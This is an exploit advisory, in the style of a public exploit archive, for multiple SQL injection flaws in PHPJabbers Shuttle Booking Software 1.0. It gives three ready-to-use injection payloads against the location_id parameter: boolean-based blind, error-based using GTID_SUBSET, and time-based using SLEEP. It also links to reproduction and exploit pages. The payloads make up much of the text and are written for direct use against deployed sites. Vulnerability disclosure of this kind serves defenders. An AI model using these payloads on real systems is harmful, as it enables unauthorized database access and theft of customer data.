Shuttle Booking Software 1.0 SQL Injection

## Title: Shuttle-Booking-Software-1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 09/10/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/shuttle-booking-software/#sectionPricing## Reference: https://portswigger.net/web-security/sql-injection## Description:The location_id parameter appears to be vulnerable to SQL injectionattacks. A single quote was submitted in the location_id parameter,and a database error message was returned. Two single quotes were thensubmitted and the error message disappeared.The attacker easily can steal all information from the database ofthis web application!WARNING! All of you: Be careful what you buy! This will be your responsibility!STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: location_id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''')AND 1347=1347 AND ('MVss'='MVss&traveling=from    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (GTID_SUBSET)    Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''')AND GTID_SUBSET(CONCAT(0x716b786a71,(SELECT(ELT(9416=9416,1))),0x71706b7071),9416) AND('dOqc'='dOqc&traveling=from    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''')AND (SELECT 1087 FROM (SELECT(SLEEP(15)))poqp) AND('EEYQ'='EEYQ&traveling=from---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Shuttle-Booking-Software-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/shuttle-booking-software-10-multiple.html)## Time spent:01:47:00